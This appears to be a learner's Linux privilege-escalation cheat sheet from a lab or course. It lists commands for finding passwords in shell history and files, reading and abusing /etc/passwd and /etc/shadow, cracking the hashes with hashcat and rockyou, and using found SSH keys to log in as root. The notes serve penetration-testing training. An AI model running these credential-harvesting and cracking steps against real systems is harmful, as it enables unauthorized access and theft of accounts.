Password and file permission

Stored Passwords

• history or cat .bash_history will show previous command and will sometines leak password

• find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;

• Sometimes a simple ls or ls -la will give interesting files

Weak File permission

• Do we have access to file that we shouldn't?

• ls -la /etc/passwd

  • This used to store password

  • If we can modify the file we can remove the x, we could change the num of the group of our user to become part of root group

• ls -la /etc/shadow

• We can copy the content of /etc/passwd in a file in our attacking machine

• we can then use unshadow unshadow passwd shadow

• We can then copy this output in another file and just keep the users with the hash

• We can now look for the hash on hashcat.net our hashes start with $6$ so we can ctrl+F this and this will give us the mode number to use.

• hashcat -m 1800 unshadowed /usr/share/wordlists/rockyou.txt -O

SSH keys

• find / -name authorized_keys 2> /dev/null

• find / -name id_rsa 2> /dev/null

• If we find an id_rsa key, we can copy it in our machine and use it to log in

• Before using it we have to change the right chmod 600 id_rsa

• And then we can just ssh -i id_rsa root@10.10.240.48